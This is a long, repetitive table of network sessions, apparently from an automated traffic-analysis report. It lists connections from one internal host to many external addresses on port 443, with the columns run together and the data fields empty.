                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192192.168.2.1440950148.155.80.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25193192.168.2.145926095.76.3.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25194192.168.2.144991244.210.2.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25195192.168.2.1443022143.242.149.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25196192.168.2.1444354220.1.130.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25197192.168.2.1436942195.71.226.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25198192.168.2.1443032125.21.71.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25199192.168.2.1438394194.69.95.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25200192.168.2.14586545.180.231.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25201192.168.2.1452708188.185.222.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25202192.168.2.1439552123.67.158.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25203192.168.2.1437888134.84.163.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25204192.168.2.1459570119.73.194.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25205192.168.2.1444076167.80.107.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25206192.168.2.1459904198.132.95.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25207192.168.2.1459434105.131.21.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25208192.168.2.143608641.237.179.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25209192.168.2.144172676.173.149.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25210192.168.2.1437794146.24.106.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25211192.168.2.1453856141.40.29.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25212192.168.2.143375299.0.190.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25213192.168.2.1460832128.174.105.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25214192.168.2.144298298.182.70.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25215192.168.2.1437106201.34.151.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25216192.168.2.1434128117.187.165.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25217192.168.2.143929247.242.144.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25218192.168.2.143965873.28.15.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25219192.168.2.1454144216.232.86.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25220192.168.2.1447850203.6.119.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25221192.168.2.1456544115.67.50.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25222192.168.2.1442140131.154.181.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25223192.168.2.145614286.217.133.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25224192.168.2.1455062222.218.106.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25225192.168.2.1440886188.63.67.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25226192.168.2.1443704157.240.98.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25227192.168.2.1436910166.195.114.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25228192.168.2.1450538120.80.169.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25229192.168.2.145133848.191.14.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25230192.168.2.143519280.12.18.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25231192.168.2.1439348222.122.103.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25232192.168.2.1460388104.203.194.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25233192.168.2.1459666204.43.170.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25234192.168.2.145531494.69.201.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25235192.168.2.145420492.133.42.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25236192.168.2.1446112217.186.73.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25237192.168.2.1439942166.213.20.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25238192.168.2.144002271.203.37.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25239192.168.2.145915668.145.185.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25240192.168.2.145513882.174.224.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25241192.168.2.144001439.202.178.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25242192.168.2.143857619.21.174.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25243192.168.2.1458086146.190.196.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25244192.168.2.145625291.37.19.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25245192.168.2.1447902176.107.49.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25246192.168.2.1448446190.104.197.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25247192.168.2.144306675.174.192.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25248192.168.2.144161699.102.245.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25249192.168.2.1450022176.255.196.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25250192.168.2.143558454.173.100.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25251192.168.2.145373035.183.144.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25252192.168.2.1460652210.96.86.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25253192.168.2.1446374112.251.118.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25254192.168.2.144807454.93.91.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25255192.168.2.1455792162.75.116.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25256192.168.2.1450428108.65.84.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25257192.168.2.1446218116.129.98.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25258192.168.2.1443006123.43.136.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25259192.168.2.1439594135.134.149.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25260192.168.2.1438100188.244.87.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25261192.168.2.144053836.70.205.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25262192.168.2.144119658.221.120.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25263192.168.2.1439920107.33.129.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25264192.168.2.1447394194.186.31.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25265192.168.2.144587036.117.11.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25266192.168.2.145815487.141.253.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25267192.168.2.1454946118.254.59.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25268192.168.2.1450400197.68.192.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25269192.168.2.1436140177.30.207.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25270192.168.2.1437002197.141.80.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25271192.168.2.1459584184.133.119.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25272192.168.2.14367389.22.33.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25273192.168.2.1452658213.190.90.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25274192.168.2.1435086123.216.25.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25275192.168.2.1440512179.24.195.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25276192.168.2.14600501.25.71.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25277192.168.2.1454872109.233.254.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25278192.168.2.14519781.167.178.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25279192.168.2.1435430200.184.220.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25280192.168.2.1455442179.182.247.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25281192.168.2.145587657.153.55.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25282192.168.2.144878089.177.22.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25283192.168.2.1433340165.96.140.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25284192.168.2.1451626201.141.22.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25285192.168.2.1454480133.218.132.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25286192.168.2.144560861.174.105.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25287192.168.2.1439066184.151.11.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25288192.168.2.146095647.144.24.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25289192.168.2.1434380198.43.51.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25290192.168.2.1451002217.79.117.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25291192.168.2.1441306175.162.163.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25292192.168.2.1448846122.31.34.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25293192.168.2.1437424203.23.178.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25294192.168.2.1456646207.241.200.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25295192.168.2.144950837.71.249.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25296192.168.2.144474071.101.80.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25297192.168.2.1448440204.228.55.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25298192.168.2.144744647.169.78.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25299192.168.2.14576242.130.16.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25300192.168.2.1436526157.178.153.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25301192.168.2.1460358123.159.42.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25302192.168.2.143564690.133.66.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25303192.168.2.1451960201.253.71.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25304192.168.2.1450376153.135.245.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25305192.168.2.1437808151.126.141.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25306192.168.2.1444396122.179.252.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25307192.168.2.1457124143.97.240.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25308192.168.2.14565409.78.192.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25309192.168.2.145202834.43.119.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25310192.168.2.144076858.77.202.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25311192.168.2.1446220202.58.219.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25312192.168.2.143777083.42.66.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25313192.168.2.144044668.225.116.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25314192.168.2.1446982221.161.163.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25315192.168.2.1449452124.166.11.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25316192.168.2.1459406186.40.18.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25317192.168.2.143891452.109.41.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25318192.168.2.144771275.219.58.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25319192.168.2.145080413.37.155.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25320192.168.2.143630850.42.161.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25321192.168.2.1448712148.211.34.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25322192.168.2.144008276.160.91.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25323192.168.2.145595285.169.11.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25324192.168.2.1455024198.146.88.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25325192.168.2.144026876.204.232.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25326192.168.2.145670624.177.170.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25327192.168.2.144549814.231.248.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25328192.168.2.143288886.66.40.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25329192.168.2.1436612171.4.95.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25330192.168.2.1441742169.68.38.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25331192.168.2.1435960143.163.203.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25332192.168.2.1454400172.134.102.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25333192.168.2.145884285.187.56.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25334192.168.2.1452068203.65.97.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25335192.168.2.1450532216.139.189.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25336192.168.2.145133627.63.7.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25337192.168.2.14592941.153.158.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25338192.168.2.1447464222.9.49.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25339192.168.2.1459968182.225.125.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25340192.168.2.1442828186.237.155.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25341192.168.2.1456958101.53.194.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25342192.168.2.146029062.148.159.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25343192.168.2.1453824103.232.206.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25344192.168.2.1446816184.124.146.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25345192.168.2.1436162205.188.130.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25346192.168.2.1433404119.99.34.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25347192.168.2.1453784100.141.104.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25348192.168.2.1443836117.142.4.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25349192.168.2.144886299.124.11.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25350192.168.2.146028624.123.183.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25351192.168.2.1451012221.34.59.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25352192.168.2.1446336190.102.36.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25353192.168.2.1437968130.138.136.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25354192.168.2.1442068191.6.185.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25355192.168.2.145842869.238.80.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25356192.168.2.144577458.77.191.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25357192.168.2.145880250.104.197.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25358192.168.2.1453942204.66.220.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25359192.168.2.145263435.159.111.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25360192.168.2.1435106143.114.194.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25361192.168.2.1455572131.85.161.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25362192.168.2.1444854118.160.61.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25363192.168.2.144781263.251.170.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25364192.168.2.143578617.20.72.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25365192.168.2.146046088.38.68.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25366192.168.2.145333460.196.229.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25367192.168.2.1449718196.183.227.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25368192.168.2.1436566130.53.90.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25369192.168.2.14383062.204.250.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25370192.168.2.144461689.130.244.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25371192.168.2.1451684177.68.51.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25372192.168.2.1446204184.20.81.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25373192.168.2.1448894187.81.224.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25374192.168.2.1450628201.246.72.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25375192.168.2.144810275.118.184.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25376192.168.2.1455580177.245.171.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25377192.168.2.1455416179.78.103.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25378192.168.2.1454644184.199.105.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25379192.168.2.143646063.118.248.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25380192.168.2.1445072199.97.123.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25381192.168.2.144881468.102.52.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25382192.168.2.1447906111.31.82.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25383192.168.2.1452252178.215.88.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25384192.168.2.1449722136.248.119.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25385192.168.2.1443928203.171.224.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25386192.168.2.1451276137.171.176.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25387192.168.2.1459296116.82.148.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25388192.168.2.145118652.148.82.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25389192.168.2.143854620.116.10.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25390192.168.2.1443464192.194.170.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25391192.168.2.1442472210.88.42.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25392192.168.2.1457634216.67.113.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25393192.168.2.1447488123.149.23.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25394192.168.2.145194827.40.199.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25395192.168.2.1434884220.11.52.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25396192.168.2.1450078194.6.91.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25397192.168.2.146080268.0.189.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25398192.168.2.145104477.245.127.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25399192.168.2.145377451.7.185.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25400192.168.2.1454994218.236.193.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25401192.168.2.1434838128.204.218.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25402192.168.2.145783089.206.43.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25403192.168.2.1456384207.214.247.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25404192.168.2.145604642.18.248.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25405192.168.2.1460530114.112.186.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25406192.168.2.1456260192.229.99.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25407192.168.2.1439436200.87.22.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25408192.168.2.1444626102.78.248.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25409192.168.2.143801872.126.84.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25410192.168.2.1448804115.153.28.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25411192.168.2.1458022121.24.109.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25412192.168.2.144749482.250.223.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25413192.168.2.144534454.19.155.166443
